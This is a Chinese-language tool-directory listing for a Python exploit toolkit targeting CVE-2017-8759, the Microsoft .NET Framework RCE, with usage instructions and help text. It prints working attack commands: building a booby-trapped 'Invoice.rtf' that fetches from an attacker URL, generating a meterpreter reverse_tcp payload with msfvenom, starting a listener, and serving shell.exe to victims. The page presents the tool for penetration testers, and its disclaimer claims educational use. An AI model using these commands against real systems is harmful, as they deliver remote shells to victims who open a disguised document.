Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-8759 — Exploit toolkit CVE-2017-8759 - v1.0 是一个便捷的 Python 脚本,为渗透测试人员和安全研究人员提供了一种快速有效的方式来测试 Microsoft .NET Framework RCE。它可以生成恶意 RTF 文件,并在无需任何复杂配置的情况下向受害者投递 metasploit / meterpreter / 其他 payload。 | Kitploit
工具/GitHubGitHub/bhdresh/cve-2017-8759
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubbhdresh/cve-2017-8759

CVE-2017-8759

Exploit toolkit CVE-2017-8759 - v1.0 是一个便捷的 Python 脚本,为渗透测试人员和安全研究人员提供了一种快速有效的方式来测试 Microsoft .NET Framework RCE。它可以生成恶意 RTF 文件,并在无需任何复杂配置的情况下向受害者投递 metasploit / meterpreter / 其他 payload。

查看仓库
3121097年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-8759 漏洞利用工具包 - v1.0

CVE-2017-8759 漏洞利用工具包 - v1.0 是一个方便的 Python 脚本,为渗透测试人员和安全研究人员提供了一种快速有效的方式来测试 Microsoft .NET Framework RCE。它可以生成恶意 RTF 文件,并在无需任何复杂配置的情况下向受害者投递 metasploit / meterpreter / 其他 payload。

免责声明

本程序仅供教育目的使用。未经许可请勿使用。通常的免责声明同样适用,尤其是本人(bhdresh)不对直接或间接使用这些程序所提供的信息或功能而造成的任何损害负责。作者或任何互联网服务提供商对这些程序或其任何衍生产品的内容或滥用概不负责。使用本程序即表示您接受以下事实:因使用这些程序而造成的任何损害(数据丢失、系统崩溃、系统入侵等)均非 bhdresh 的责任。

最后,这是一个个人开发项目,请尊重其理念,不要将其用于不良用途!

许可证

CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/

发布说明:

为脚本引入了以下功能:

root@kitploit:~
- Generate Malicious RTF file
- Exploitation mode for generated RTF file

版本:Python 2.7.13

场景:投递本地 meterpreter payload

视频教程:https://www.youtube.com/watch?v=46jEa1bmORM
示例命令
root@kitploit:~
1) Generate malicious RTF file
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

命令行参数:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)

Modes:

-M gen                                          Generate Malicious file only

     Generate malicious RTF file:

      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

      -u <http://attacker.com/test.txt>   Path of remote txt file. Normally, this should be a domain or IP where this                                          tool is running.
                                          For example, http://attackerip.com/test.txt (This URL will be included in 	                                              malicious RTF file and will be requested once victim will open malicious RTF file.

				      
-M exp                                          Start exploitation mode

     Exploitation:
  
      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 Specify local path of an executable file / meterpreter shell / payload.

作者

@bhdresh

致谢

@Voulnet, @vysec, @bhdresh

Bug、问题与功能请求

显然,我不是全职开发者,所以可能会遇到一些问题。

请通过 https://github.com/bhdresh/CVE-2017-8759/issues/new 报告 Bug 和问题。

下载工具